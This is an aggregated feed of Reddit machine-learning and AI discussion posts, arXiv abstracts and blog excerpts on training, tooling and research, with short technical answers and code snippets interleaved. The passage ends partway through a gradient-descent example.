    Hi, I have implemented backprop using the Eigen library. My code is "vectorised" in the sense that I am using Eigen matrices to calculate gradients (but I'm not sure this is fully vectorised, as I think you are supposed to vectorise over the training data somehow). I think this means my code takes advantage of the full resources of a single core on my CPU, but I would like backprop to use all of the cores. I am wondering at what "level" to implement parallelised backprop: (1) At the level of the matrix. Eigen already takes advantage of vectorisation, and apparently it can take advantage of multiple cores (see here - the website is down), but I have tried to use this functionality: the "nbThreads()" method returns e.g. 4, yet I don't see any speedup. Perhaps the Eigen algorithms that can be parallelised (matrix multiplication) are not the ones used in backprop. (2) At the level of backprop for calculating gradients for a single item. I don't think this works, because each layer of the network depends on the later layer (backprop) or earlier layer (feedforward), and I don't think you can parallelise within a layer, as that is effectively just the matrix multiplication of (1). (3) At the level of the batch. For example, with a batch size of 8 you could have 8 threads, each calculating the gradients of one item in the batch. I think this could be done in parallel, as there are no dependencies between them, but (a) each thread needs access to the same weight data, which might slow things down, and (b) parallelisation is limited to the size of the batch. Any ideas? Thanks submitted by /u/Naive_Dark4301 [link] [comments]  ( 9 min )
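On "vectorising over the training data": the usual answer is to do the batch-level parallelism inside the matrix algebra rather than with explicit threads. Stacking the batch into one matrix (one row per item) turns the per-item loop into a single large matrix product, which Eigen, or any BLAS backend, can then parallelise internally. A sketch of the idea in NumPy notation (the shapes and values are illustrative):

```python
import numpy as np

rng = np.random.default_rng(0)
batch, n_in, n_out = 8, 16, 4
X = rng.standard_normal((batch, n_in))   # the whole batch, one row per item
W = rng.standard_normal((n_in, n_out))

# forward: one matrix product for all 8 items at once
Z = X @ W

# backward: given dL/dZ for the batch, the weight gradient is a single
# product too (it implicitly sums the per-item outer products)
dZ = rng.standard_normal((batch, n_out))
dW = X.T @ dZ
dX = dZ @ W.T

# same result with an explicit per-item loop, for comparison
dW_loop = sum(np.outer(X[i], dZ[i]) for i in range(batch))
assert np.allclose(dW, dW_loop)
```

Doing it this way avoids problem (a) entirely (one shared GEMM instead of 8 threads contending for the weights), and the larger matrix products give Eigen's internal parallelism something worth splitting across cores.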
    14 Examples of How LLMs Can Transform Materials Science and Chemistry: A Reflection on a Large Language Model Hackathon. (arXiv:2306.06283v3 [cond-mat.mtrl-sci] UPDATED)
    Large-language models (LLMs) such as GPT-4 caught the interest of many scientists. Recent studies suggested that these models could be useful in chemistry and materials science. To explore these possibilities, we organized a hackathon. This article chronicles the projects built as part of this hackathon. Participants employed LLMs for various applications, including predicting properties of molecules and materials, designing novel interfaces for tools, extracting knowledge from unstructured data, and developing new educational applications. The diverse topics and the fact that working prototypes could be generated in less than two days highlight that LLMs will profoundly impact the future of our fields. The rich collection of ideas and projects also indicates that the applications of LLMs are not limited to materials science and chemistry but offer potential benefits to a wide range of scientific disciplines.  ( 3 min )

    [D] Large language model that can source historic artworks
    Does anyone know of an LLM that accepts images (.jpg) and can "curate" it to provide historical context, a description of the piece, artistic context, etc? I would love to use it on artworks from 1600s and 1700s, but I'll take anything that works with 1920 pieces and earlier. submitted by /u/GawkyCoolDude [link] [comments]  ( 8 min )
    [D] Where to start learning more with existing knowledge?
    Title, I just graduated from school with a CS degree. I took a couple 10 week AI classes, some computer vision classes, and a robust machine learning course. I also made some contributions to a large senior project that dealt with a fairly complex object detection ML model. Despite all of this I feel like my understanding of ML is pretty flimsy. I'm not sure if I should do Andrew Ng's Coursera or if there would be a better place for me to start given my background. I would say my goals are to acquire a deep enough understanding to start building my own models and potentially get a decent job within the ML space. submitted by /u/mythica44 [link] [comments]  ( 8 min )
    [D] Audio Style Transfer?
    I saw this on YouTube and was wondering how it was done? I've dabbled before with stable diffusion so I'm a little bit familiar with style transfer using images but how is it done with audio? submitted by /u/That_Canadian_Nerd [link] [comments]  ( 8 min )
    [P] Performance Evaluation for AI models on non-binary, complex tasks
    Hi r/MachineLearning, I am currently writing my thesis, and as part of my work I'm assessing the capability of GPT-4 on complex tasks where there are no binary solutions. If I gave these tasks to, say, 5 subject matter experts, I would probably get 5 differing opinions on the correct solution. In real life those experts would sit down together and try to come to a common understanding of the right solution for the task. Now, the results of GPT-4 in my experiments are astonishingly good if I evaluate them myself. However, I can't seem to find literature delivering or explaining sound, objective approaches to evaluating these kinds of tasks. Does anyone have ideas or literature to recommend? If not, my backup plan is to evaluate the results myself and through other subject matter experts, so basically through human discrimination. Any help or information is greatly appreciated. submitted by /u/plutorollsvanillaice [link] [comments]  ( 9 min )
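If the backup plan is human raters, one standard way to put an objective number on "5 experts, 5 opinions" is an inter-rater agreement statistic. A sketch of Cohen's kappa for two raters (for more than two, Fleiss' kappa or Krippendorff's alpha are the usual choices; the labels below are illustrative):

```python
from collections import Counter

def cohens_kappa(rater_a, rater_b):
    """Agreement between two raters, corrected for chance agreement."""
    assert len(rater_a) == len(rater_b)
    n = len(rater_a)
    labels = set(rater_a) | set(rater_b)
    p_observed = sum(a == b for a, b in zip(rater_a, rater_b)) / n
    ca, cb = Counter(rater_a), Counter(rater_b)
    p_chance = sum((ca[l] / n) * (cb[l] / n) for l in labels)
    return (p_observed - p_chance) / (1 - p_chance) if p_chance < 1 else 1.0

print(cohens_kappa(["good", "bad", "good", "good"],
                   ["good", "bad", "bad", "good"]))  # 0.5
```

Reporting the agreement among the human experts alongside the model scores also tells readers how much disagreement is inherent to the task itself.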
    [R] 🤓 Does Ai Think As We Do? Evaluating Global Alignment
    🤓 Does Ai Think As We Do? Evaluating Global Alignment Researchers at Anthropic developed a method to evaluate how well large language models like ChatGPT reflect diverse global opinions, not just the biases of the model developers. They created a dataset called GlobalOpinionQA with survey questions and answers from people in different countries. Designed a metric to quantify how closely model responses match human answers by country. Tested a model intended to be helpful, honest, and harmless. The goal is to measure if models represent a variety of global perspectives or are skewed towards certain viewpoints. This work aims to guide the creation of inclusive AI that serves people worldwide, not just programmer biases. submitted by /u/Yavero [link] [comments]  ( 8 min )
    [D] CUDA
    Hello guys, I wrote a python code for DRL in Visual studio. However, it takes a long time in training. Could you give me instructions to run the code with CUDA knowing that I have already installed Nvidia CUDA. Thank you. submitted by /u/GuavaAgreeable208 [link] [comments]  ( 8 min )
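Assuming the DRL code uses PyTorch (the post doesn't say which framework), the usual pattern is: install a CUDA-enabled build of PyTorch (installing the NVIDIA CUDA toolkit alone is not enough), then move the model and every tensor to the same device. A minimal sketch:

```python
import torch

# falls back to CPU when no GPU is visible, so the script still runs
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

model = torch.nn.Linear(4, 2).to(device)   # move the parameters to the device
x = torch.randn(8, 4, device=device)       # create inputs on the same device
out = model(x)                             # runs on the GPU when available
```

If `torch.cuda.is_available()` returns False despite the driver being installed, reinstall PyTorch using the command from the install selector on pytorch.org for your CUDA version.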
    [Discussion] Is CLIP model still state of the art?
    Hi ML community, I've been out of the ML/computer vision research loop for a while. In the past two years, have there been any major improvements on the CLIP model since OpenAI released it in 2021? Thanks! submitted by /u/goodfriedchicken [link] [comments]  ( 8 min )
    [D] Anonymize / Obfuscate speech when doing audio classification.
    Hey! Let me preface that I am new to audio processing and audio analysis ;) I am trying to classify audio data in an environment where people are. Recording people is a big no no here. (Well the recording was okayed under the premise that no talks can get transcribed and that no people are recognizable) The first idea was to simply use a band filter and cut out the frequency range of normal speech but some of the signals I am interested might also fall into that range so I would rather avoid that. Then I looked into spectrograms which looked promising for classification in general. I found the librosa library in python and started doing stft. I had planned to save the amplitude S = np.abs(librosa.stft(signal, n_fft=) to maybe work on some other feature extraction or post proces…  ( 9 min )
    [R] HyperDreamBooth: HyperNetworks for Fast Personalization of Text-to-Image Models
    Project page: https://hyperdreambooth.github.io/ Twitter thread: https://twitter.com/natanielruizg/status/1679893292618752000?s=20 Paper: https://arxiv.org/abs/2307.06949 ​ HyperDreamBooth: smaller, faster, better. Abstract Personalization has emerged as a prominent aspect within the field of generative AI, enabling the synthesis of individuals in diverse contexts and styles, while retaining high-fidelity to their identities. However, the process of personalization presents inherent challenges in terms of time and memory requirements. Fine-tuning each personalized model needs considerable GPU time investment, and storing a personalized model per subject can be demanding in terms of storage capacity. To overcome these challenges, we propose HyperDreamBooth - a hypernetwork capable of efficiently generating a small set of personalized weights from a single image of a person. By composing these weights into the diffusion model, coupled with fast finetuning, HyperDreamBooth can generate a person's face in various contexts and styles, with high subject details while also preserving the model's crucial knowledge of diverse styles and semantic modifications. Our method achieves personalization on faces in roughly 20 seconds, 25x faster than DreamBooth and 125x faster than Textual Inversion, using as few as one reference image, with the same quality and style diversity as DreamBooth. Also our method yields a model that is 10000x smaller than a normal DreamBooth model. submitted by /u/StrawberryNumberNine [link] [comments]  ( 9 min )
    [D] The Problem With LangChain
    https://minimaxir.com/2023/07/langchain-problem/ tl;dr it's needlessly complex, and I provide code examples to demonstrate such. A few weeks ago when I posted about creating a LangChain alternative to /r/MachineLearning, most of the comments replied "what exactly is the issue with LangChain", so I hope this provides more clarity! submitted by /u/minimaxir [link] [comments]  ( 8 min )
    New Research from Microsoft using Autoencoders to extend context length
    submitted by /u/Working_Ideal3808 [link] [comments]  ( 8 min )
    [P] Google ML Kit Face Detection | Enhance Your App's Visual Intelligence
    Facial detection and recognition technology have become an integral part of our daily lives, revolutionizing industries such as security, entertainment, and marketing. Google ML Kit, a powerful machine-learning platform....... Article Link submitted by /u/waqararif [link] [comments]  ( 8 min )
    [Discussion] Importance of prompt engineering in AI
    Hewwo ML chads. jk. Now that I have y'all's attention, I wanna ask how important you would rate proper prompt engineering to be. Like, would you go as far as to learn how to prompt a model perfectly, or use a tool for it? And if so, do y'all rate the tools, or d'you think they're just forcing their place in the market? Opinions/suggestions/recommendations welcome, I just wanna know what the general consensus is about prompt engineering submitted by /u/WorriedMentality [link] [comments]  ( 8 min )
    [P] Trying to build a smart ingredient parser app, need some ideas please
    Hey guys, I'm working on a university project where I am developing an Android application that uses OCR to scan ingredient contents on the back of food products and provide detailed descriptions of the ingredients, identify potential allergens, and estimate the healthiness factor of the overall food product. Can you suggest some key ideas/features for which I can use Machine Learning as an extra added implementation for my project? submitted by /u/shrux2k [link] [comments]  ( 8 min )
    [D] ICCV final decisions announced today!
    Any changes to the score post-rebuttal? Did they even read your rebuttal? submitted by /u/Alarming-Aspect705 [link] [comments]  ( 8 min )
    [D] Looking for papers on human evaluation of xAI techniques
    I hope that this question fits this sub: I'm currently interested in explainable AI methods. I want to incorporate them into a dashboard to increase the transparency and trust in an underlying Text Classification Model. Currently, SHAP looks promising, but I'm wondering: Which methods work best from a non-technical enduser perspective? What do I need to consider during the design phase? I haven't found good papers that compare different methods and their effectiveness. Does anyone know good papers regarding this? submitted by /u/zeoNoeN [link] [comments]  ( 8 min )
    [D] PyTorch Lightning vs Hugging Face for production on Azure ML
    Hi, recently I joined a company and there is a discussion about transitioning from a custom PyTorch interface to a PyTorch Lightning or Hugging Face interface for ML training and deployment on Azure ML. The product relates to CV and NLP. Does anyone have experience with, or pros/cons of, each for production ML development? submitted by /u/ApplicationOne582 [link] [comments]  ( 8 min )
    [D] Simple sequence prediction problem
    Hello, I'm not an expert of ML or any AI topics but have played in the past using LSTMs + RNN for character/word prediction. I'm wondering what -as of today- best model or method should be used to predict sequences. The dataset can be constructed by me in two ways. Either way it is going to be a fixed 31+space (32) word: Having human readable characters like (ZaaaaZZZZZZZZZZZAZZZZZaAAaZZZZZ ZbbbbZZZZZZZZZZZBZZZZZbBBbbBZZZ CccccccZZZZZZZZZCZZZZZcCCccCCZZ DddddddddZZZdddDDDZZZZdDDddDDZY EeeeeeeeeZZZEeeEEEZZZZeEEeeEEZY FfffffffFZZZFffFFFZZZZfFFffFFZY GgggggggGGggGggGGGGgGggGGggGGGY) Having UTF-8 characters like (^BȁȂȃ؃؄؅؆؇؈؉؊؋،؍Џ؏ؐؑȕ^Y^ZȘؘؙ؛؜ ׿^DȄȆȈ؉؋؍؏ؑؓ؛؝РﺀﺃﺇﺍﺓȬ57Ȳ;ȶﻂﻋػ ȁ^FȇȊȍȐȓؘؕ؛؞ﺀﺅﺎﺘﺣбﺲﻀﻋؼؿɃMPɌVɒ\ٗٚ Ȃ^HȊȎȒȖȚȞȢﺇﺔﺣȲȶAȾтɆﻯٍّɚeiɦqɮyٵ ȃ^KȍȒȗȜȡȦȫﺪﺸﻋFɄPɎѓɘٜ١٦٫ɱ}ʀʊړ Ȅ^MȐȖȜȢȨȮȴﻉؿﻡSɒ_ɞѤqٯٵٻځʈʚ§ʦ³ڱ¿ ȅ^OȓȚȡȨȯȶȽﻚﻳّ`gnɮѵڂډڐڗʟ­´ʴÂ˂ÐۏÞ Ȇ^QȖȞȦȮȶEɆٍٕmu}ɾ҆ڕڝڥڭʶÅÍˎÝ˞íۭý ȇ^SșȢȫȴȽMɏɘɡqzʎҗ§ʩ¹Â˄ˍÝæ˨ø˺ĊԌĜ) Both contain the same information and is an encoded sequence of states. I'm trying to predict the states. You notice that in the 1) the first word is "a" or "A" while the next sequence is going to be "b"/"B" and the third sequence is "c"/"C and so on. The same logic applies to the UTF-8. Each character here matters. The file contains around 3924 lines, each one looking either 1) or 2). I dont know, if a) which encoding is more appropriate for ML character prediction b) which model/technology to use to generate these sequences if I input a start pattern, e.g. (ZaaaaZZZZZZZZZZZAZZZZZaAAaZZZZZ ZbbbbZZZZZZZZZZZBZZZZZbBBbbBZZZ CccccccZZZZZZZZZCZZZZZcCCccCCZZ) it should generate the most likely probable next sequences. Historically, char-rnn was used for this problem and the result was so so. Can anyone pls point me out to the right solution for this problem and maybe some github examples to try on this? submitted by /u/mcr-ksh [link] [comments]  ( 9 min )
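Before reaching for an LSTM or a Transformer, a character-level n-gram model is a cheap baseline for highly structured data like this, and it sidesteps the encoding question (it works on either alphabet as long as the lines are consistent). A sketch with illustrative names; the "^" start-of-line marker is an assumption and would need changing if that character appears in the data:

```python
from collections import Counter, defaultdict

def train_ngram(lines, order=3):
    """Count which character follows each `order`-character context."""
    model = defaultdict(Counter)
    for line in lines:
        padded = "^" * order + line   # "^" marks the start of a line
        for i in range(order, len(padded)):
            model[padded[i - order:i]][padded[i]] += 1
    return model

def predict_next(model, context, order=3):
    """Return the most frequent continuation of the last `order` chars."""
    ctx = ("^" * order + context)[-order:]
    counts = model.get(ctx)
    return counts.most_common(1)[0][0] if counts else None

m = train_ngram(["abcabcabc"])
print(predict_next(m, "ab"))  # c
```

If the n-gram baseline is already "so so", a small character-level Transformer (nanoGPT-style) is the current default upgrade over char-rnn; either way, the human-readable encoding (option 1) is safer, since each state maps to exactly one ASCII character instead of a multi-byte UTF-8 sequence.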
    [P] Unleashing Insights: Guiding Synthetic Data Generation through Interactive Exploration in Spotlight 🚀
    I wrote an article in which I explored the power of interactive data exploration with Spotlight for synthetic data generation. I highlighted the challenges of working with Jupyter Notebooks and introduced Spotlight as an alternative tool. By leveraging Spotlight's features, such as similarity maps and histograms, I uncovered critical segments in the dataset and provided actionable insights for synthetic data generation. Join me on this journey to unlock the full potential of your data! Check out the full article for all the details. Article on medium: Link Happy learning! ​ https://i.redd.it/hdc0c0fw0wbb1.gif submitted by /u/ml-wizard [link] [comments]  ( 8 min )
    Hey guys, in this video I test whether AI knows where I live!
    submitted by /u/NJ_Highways [link] [comments]  ( 8 min )
    AI Beyond Software: Robotics, Autonomous Vehicles, Drones, and More
    Hello everyone! We've witnessed a surge of AI-powered tools flooding the market, particularly in the SaaS category. But what about other domains like robotics and agriculture? AI is making great strides in those fields too, and I've come across some fascinating innovations and technologies that aim to enhance our lives. From autonomous vehicles to weed-killing robots, self-checkout shopping, and more, I've compiled them all in one place and would love to share them with you. Here's the link: https://favird.com/l/ai-beyond-software The list is regularly updated, and I'll keep adding new items as soon as I discover them. If you have any recommendations you'd like to share, please submit them there so we can explore and learn together. It would be greatly appreciated if you could also share the link, as it will help the list grow faster. Thanks, and cheers! submitted by /u/GrabWorking3045 [link] [comments]  ( 8 min )
    Using ChatGPT on iPhone
    Do you know how to use ChatGPT on iPhone? submitted by /u/Imagine-your-success [link] [comments]  ( 8 min )
    AI — weekly megathread!
    This week in AI - provided by aibrews.com feel free to follow their newsletter News & Insights Stability AI launches Stable Doodle, a sketch-to-image tool that converts a simple drawing into a dynamic image. Under the hood, Stable Doodle combines Stable Diffusion XL with T2I-Adapter, which offers additional guidance to pre-trained text-to-image (SDXL) models while keeping the original large text-to-image models unchanged. Stable Doodle is available on the Clipdrop by Stability AI website and app (iOS and Google Play) [Details]. Anthropic launched Claude-2, a ChatGPT rival, supporting up to 100K tokens per prompt (corresponding to around 75,000 words), with enhanced performance in coding, math and reasoning. It’s available via API and a beta website, claude.ai, for US and UK users [Det…  ( 11 min )
    Is there any way I can generate animations for short stories for YouTube videos?
    I have ideas for short stories. Are there any AI related animation sites that I could use to create YouTube short videos? I can figure out the script, story, dialogues, and the audio. I just need the animation videos. submitted by /u/zer0_snot [link] [comments]  ( 8 min )
    Photonic chips for training big matrix operations in AI neural-network models, summarized by Anastasi in Tech. Multicolored photons are sent in parallel through waveguides in these new photonic chips, a rapidly developing field that is roughly 1000 times less power-intensive than silicon.
    submitted by /u/MegavirusOfDoom [link] [comments]  ( 8 min )
    Are there any good free AI TTS voice generators?
    Looking for a free, natural-sounding TTS for voice narration on YouTube videos. submitted by /u/outoffit [link] [comments]  ( 8 min )
    Beginner looking for AI
    Hello guys, I'm currently looking for AIs I can use. I see most of them are paid, but I want to use something free. The topics would be video, audio, programming, and similar. Any recommendations? submitted by /u/ArraysStartAt1LoL [link] [comments]  ( 8 min )
    Using a bunch of creative AI to help bring my writings on consciousness alive!
    Tldr: I made a cool futuristic depiction of "Leonardo Da Vinci" talk about my ramblings and writings on consciousness. Sometimes we simply don't have the time to read through blog posts or other people's writings because we're so entrapped in our own reading, or a lot of people just prefer to hear it through audio. I know I love listening to audiobooks and watching lectures on YouTube. For the longest time I wanted to have my writing spoken through some sort of cool art piece that I developed myself, like the futuristic, weird-looking version of Da Vinci I had in my head, and finally, through various AI and software tools as well as a couple of other little tweaks here and there, I was able to edit this video and bring my writing to life. The first of many, hopefully. It was a mixture of D-ID, DALL-E, Windows Editor, Eleven Labs, and my own writing and home-brew coding on Auto-GPT that made all this possible. It's not perfect by any means, but it's certainly in the right direction of what I want. I make some pretty bold statements and don't always back them up with perfect citations, so please take this all with a grain of salt. It's meant to foster more thought and questions, not necessarily to decide what reality actually is. Moreover, it's really fun that I was able to get something like this put together just by myself. I'm sure someone with better editing and video skills could create something far more polished, but as far as things I've created go, I'm pretty proud of it. submitted by /u/Parking-Food-1659 [link] [comments]  ( 9 min )
    "AI is evil"
    A comment posted on one of the AI images I posted on social media, without a hint of irony. By this token, electricity is the most evil technology ever developed. In order to run and maintain electricity, humans have committed unspeakable atrocities against wildlife and the environment, and may end up making the entire planet uninhabitable at some point. We are also actively stealing energy from future generations, consuming most of what is available within just a handful of generations. Not to mention all the terrible things people have done to other people thanks to electricity. I suppose every human alive today is complicit in that evil by simply harnessing electricity. Unplug that air conditioner, evil complicit scum! I found it humorous that this person made this comment on social media, which is also a technology that has been harnessed for evil purposes. submitted by /u/ShaneKaiGlenn [link] [comments]  ( 8 min )
    The workers at the frontlines of the AI revolution - Rest of World
    submitted by /u/Jojuj [link] [comments]  ( 8 min )
    I found this video online. The voice is for sure AI, but I'm not fully convinced the guy is. Thoughts? And if he is AI, what program did they use to make him?
    submitted by /u/GlaceLitz [link] [comments]  ( 8 min )
    Looking for an AI to find a song using audio clip
    Looking for the full song from the outro of a YouTube video I heard submitted by /u/The84th [link] [comments]  ( 8 min )
    Lawsuit Claims Stability AI's CEO Misled Cofounder to Sell 15% Stake for $100
    submitted by /u/TheSlammedCars [link] [comments]  ( 8 min )
    An AI to clone voices.
    Hi everyone, I'm searching for an AI that can clone voices. I know there are a lot of them on the Internet, but I couldn't find the one I need. My project is to reproduce the voices of Disney characters and make them say texts I wrote. Is it possible? submitted by /u/Zumcddo [link] [comments]  ( 8 min )
    Best AI or program to recreate a voice from limited recordings
    I'm looking for an AI or service that can recreate a voice from existing recordings. I have a handful of voicemails from my mother, who has since passed. I am trying to see if there is a way to recreate her voice; however, most online "AI voice creation" sites I found want one or more specific sentences read by the person whose voice is being recreated, which is obviously impossible in this case. Does anyone know of a site or service that might be able to recreate a voice from a half dozen 30-second-long voicemail recordings? submitted by /u/animeace01 [link] [comments]  ( 8 min )
    I got an AI NPC to admit it's an NPC!
    submitted by /u/RandoEncounter [link] [comments]  ( 8 min )
    160,000 actors are going on strike over the threat of generative AI
    This is the first massive strike since 1960, and one of the key reasons behind it is generative AI. What do you think? Will text-to-video take over Hollywood in the next couple of years? Link to the BBC article. submitted by /u/Ok-Judgment-1181 [link] [comments]  ( 8 min )
    Working on my first public project and have some questions about databases and their worth, along with how ethical certain public databases are to use.
    So I mainly generate my own databases via algorithms or paid users who write the data I use for my private models. Thing is, it's expensive when working on a massive project, and my current project is an advanced form of text generation and chat capabilities. So my question here specifically is: I found a database on Kaggle of 51 million Discord messages from anonymous users. The messages have context but still require a lot of refinement and work. Is it ethical to use this database, which was probably collected without the knowledge of the anonymous users present in it, given that Discord's TOS is against such databases and data collection...? submitted by /u/JamesAibr [link] [comments]  ( 8 min )
    Deconstructing an agent's policy
    Has anyone seen any papers or heard of research that tries to take an agent's policy and return not just the optimal set of actions, but also the next n suboptimal sets of actions that achieve the objective/goal? Hopefully that makes sense. In the simplest case, gridworld admits many paths to the goal state; in practice, after training, the agent returns the optimal path. Is there instead a way to return, say, the top 5 optimal paths? This seems like it might be in the literature somewhere, but I'm struggling to find any papers that address or even note something like this. submitted by /u/Peneloki [link] [comments]  ( 8 min )
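For gridworld specifically, the question can be answered by brute force before reaching for the literature: enumerate all simple paths and rank them by length. A stdlib sketch (exponential in grid size, so toy grids only; cell coordinates and grid size are invented for illustration):

```python
def all_paths(n):
    """Enumerate every simple path from (0,0) to (n-1,n-1) on an n x n grid."""
    goal = (n - 1, n - 1)
    paths = []

    def dfs(cell, path):
        if cell == goal:
            paths.append(path)
            return
        x, y = cell
        for nx, ny in ((x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)):
            nxt = (nx, ny)
            if 0 <= nx < n and 0 <= ny < n and nxt not in path:
                dfs(nxt, path + [nxt])

    dfs((0, 0), [(0, 0)])
    return paths

def top_k_paths(n, k):
    """Shortest-first ranking: the 'top 5 optimal paths' the post asks about."""
    return sorted(all_paths(n), key=len)[:k]

for p in top_k_paths(3, 5):
    print(len(p) - 1, p)   # number of moves, then the path
```

On a 3x3 grid there are exactly 6 shortest paths (the monotone lattice paths), so the top 5 all tie at 4 moves; for learned policies, the analogous trick is rolling out the top-n actions per state by Q-value rather than only the argmax.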
    Open loop planning: a sequence of blind inputs that beats _Pokémon FireRed_ 99% of the time
    submitted by /u/gwern [link] [comments]  ( 8 min )
    "Instruction Mining: High-Quality Instruction Data Selection for Large Language Models", Cao et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    SAC underactuated pendulum problem
    I'm currently working on a project involving the underactuated pendulum problem, specifically the "unbalanced disk". You can find the code base here. I am using the reward function of Pendulum-v1. I've had success solving the problem with DQN, and improved its performance with hyperparameter optimization; this all worked fine. However, I would like to solve this environment with SAC as well. You can find the SAC implementation I'm using here; I changed small things to make the environment work and added mixed-precision training to speed up training. Here is an image of the environment getting stuck in that position as well. The black arrow shows the direction of the force being applied. https://preview.redd.it/uuwtqvbjgxbb1.png?width=475&format=png&auto=webp&s=7a13693d5a84339726edb9b394a0fca5c9f5bc35 My main challenge right now is that the SAC algorithm does not converge to the desired result. Rather than reaching the top of the pendulum swing as intended, it settles at the side position. I understand the issue is probably that it has to swing up first. However, DQN was capable of doing it, so I wonder why SAC wouldn't be. I've been running a series of hyperparameter optimizations in an attempt to find a combination that solves this environment, without success so far. Here are the ranges I've been using for the hyperparameter search space: lr = trial.suggest_float('lr', 1e-5, 1e-4, log=True), batch = trial.suggest_categorical('batch', [32, 64, 128, 256]), gamma = trial.suggest_float('gamma', 0.90, 0.999), alpha = trial.suggest_float('alpha', 0.01, 0.5), polyak = trial.suggest_float('polyak', 0.01, 0.9). If someone has some pointers to solve this, please let me know! Most learning curves look like this as well: https://preview.redd.it/dj5sp7ikhxbb1.png?width=566&format=png&auto=webp&s=5b50c98a82a4a2d9499ea6bc87132f3b4424da99 submitted by /u/r3ktIKevin [link] [comments]  ( 9 min )
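One thing worth ruling out in a search range like polyak ∈ [0.01, 0.9]: implementations disagree on whether "polyak" names the soft-update fraction τ (conventionally small, ~0.005) or its complement 1 − τ, so 0.9 can mean either nearly frozen or nearly hard-copied target networks depending on the library. A stdlib sketch of the soft target update itself, with invented toy numbers:

```python
def polyak_update(target, online, tau):
    """Soft target-network update: target <- (1 - tau) * target + tau * online."""
    return [(1 - tau) * t + tau * o for t, o in zip(target, online)]

# Toy 'parameter vectors' to show the tracking speed
target = [0.0, 0.0]
online = [1.0, 2.0]
for _ in range(3):
    target = polyak_update(target, online, tau=0.005)
print(target)   # after 3 updates, target has moved only ~1.5% toward online
```

With tau = 0.9 under the same convention, the target would nearly equal the online network after one step, which changes SAC's stability characteristics dramatically.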
    Large language models and mnemonics
    The Major mnemonic system encodes numbers as words in order to make them easier to remember. Digits correspond to consonant sounds (not spellings) as explained here. You can use the system ad hoc, improvising an encoding of a word as needed, or you can memorize canonical encodings of numbers, also known as pegs. Pegs have […] Large language models and mnemonics first appeared on John D. Cook.  ( 7 min )
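A letter-level approximation of the Major system's digit-to-consonant table can be sketched in a few lines. Note this is a simplification: the real system keys on consonant sounds, not spellings (e.g. "sh"/"ch" map to 6, a soft "c" to 0), which this sketch skips.

```python
# Standard Major-system table, approximated at the letter level
MAJOR = {
    's': 0, 'z': 0,
    't': 1, 'd': 1,
    'n': 2,
    'm': 3,
    'r': 4,
    'l': 5,
    'j': 6,
    'k': 7, 'g': 7,
    'f': 8, 'v': 8,
    'p': 9, 'b': 9,
}

def word_to_digits(word):
    """Rough Major-system decode: mapped consonant letters -> digits, rest skipped."""
    return "".join(str(MAJOR[c]) for c in word.lower() if c in MAJOR)

print(word_to_digits("tomato"))  # t, m, t -> 131
```

Going the other direction (number to peg word) is the harder, dictionary-search half of the system, and the half where an LLM's word knowledge plausibly helps.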
    When does a function have an addition theorem?
    Motivating examples The addition theorem for cosine says that cos(x + y) = cos(x)cos(y) − sin(x)sin(y), and the addition theorem for hyperbolic cosine is analogous, though with a sign change: cosh(x + y) = cosh(x)cosh(y) + sinh(x)sinh(y). An addition theorem is a theorem that relates a function’s value at x + y to its values at x and at y. The squaring function satisfies a very simple addition theorem […] When does a function have an addition theorem? first appeared on John D. Cook.  ( 6 min )
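Both identities are easy to sanity-check numerically with the standard library (the sample point is arbitrary):

```python
import math

x, y = 0.7, 1.3

# Circular cosine: cos(x + y) = cos x cos y - sin x sin y
lhs = math.cos(x + y)
rhs = math.cos(x) * math.cos(y) - math.sin(x) * math.sin(y)
print(abs(lhs - rhs))     # ~0 up to floating-point error

# Hyperbolic cosine: same shape with the sign flipped
lhs_h = math.cosh(x + y)
rhs_h = math.cosh(x) * math.cosh(y) + math.sinh(x) * math.sinh(y)
print(abs(lhs_h - rhs_h)) # likewise ~0
```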
    AI helps household robots cut planning time in half
    PIGINet leverages machine learning to streamline and enhance household robots' task and motion planning, by assessing and filtering feasible solutions in complex environments.  ( 9 min )
    Study finds ChatGPT boosts worker productivity for some writing tasks
    A new report by MIT researchers highlights the potential of generative AI to help workers with certain writing assignments.  ( 9 min )
    A new way to look at data privacy
    Researchers create a privacy technique that protects sensitive data while maintaining a machine-learning model’s performance.  ( 10 min )
    How Do Companies Use Artificial Intelligence?
    By now, AI-based tools have totally changed the way companies operate across all industries. Companies use AI to streamline operations, make informed decisions, and enhance customer experiences. They utilize it in a multitude of ways, such as automating repetitive tasks, predicting customer behavior, and optimizing supply chain management. Today, we will dive… Read More »How Do Companies Use Artificial Intelligence? The post How Do Companies Use Artificial Intelligence? appeared first on Data Science Central.  ( 21 min )
    Training Diffusion Models with Reinforcement Learning
    Diffusion models have recently emerged as the de facto standard for generating complex, high-dimensional outputs. You may know them for their ability to produce stunning AI art and hyper-realistic synthetic images, but they have also found success in oth…  ( 7 min )
    Prospective Learning: Principled Extrapolation to the Future. (arXiv:2201.07372v2 [cs.LG] UPDATED)
    Learning is a process which can update decision rules, based on past experience, such that future performance improves. Traditionally, machine learning is often evaluated under the assumption that the future will be identical to the past in distribution or change adversarially. But these assumptions can be either too optimistic or pessimistic for many problems in the real world. Real world scenarios evolve over multiple spatiotemporal scales with partially predictable dynamics. Here we reformulate the learning problem to one that centers around this idea of dynamic futures that are partially learnable. We conjecture that certain sequences of tasks are not retrospectively learnable (in which the data distribution is fixed), but are prospectively learnable (in which distributions may be dynamic), suggesting that prospective learning is more difficult in kind than retrospective learning. We argue that prospective learning more accurately characterizes many real world problems that (1) currently stymie existing artificial intelligence solutions and/or (2) lack adequate explanations for how natural intelligences solve them. Thus, studying prospective learning will lead to deeper insights and solutions to currently vexing challenges in both natural and artificial intelligences.  ( 3 min )
    Provably Faster Gradient Descent via Long Steps. (arXiv:2307.06324v2 [math.OC] UPDATED)
    This work establishes provably faster convergence rates for gradient descent via a computer-assisted analysis technique. Our theory allows nonconstant stepsize policies with frequent long steps potentially violating descent by analyzing the overall effect of many iterations at once rather than the typical one-iteration inductions used in most first-order method analyses. We show that long steps, which may increase the objective value in the short term, lead to provably faster convergence in the long term. A conjecture towards proving a faster $O(1/T\log T)$ rate for gradient descent is also motivated along with simple numerical validation.
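The paper's headline effect can be reproduced on a toy quadratic: a schedule mixing an occasional step larger than 2/L (which increases the objective) with short steps still contracts overall. The schedule below is purely illustrative, not the paper's certified stepsize pattern:

```python
def gd(x0, steps):
    """Gradient descent on f(x) = x^2 / 2 (so grad f(x) = x, and L = 1)."""
    x = x0
    history = [0.5 * x * x]
    for h in steps:
        x -= h * x              # x <- (1 - h) x
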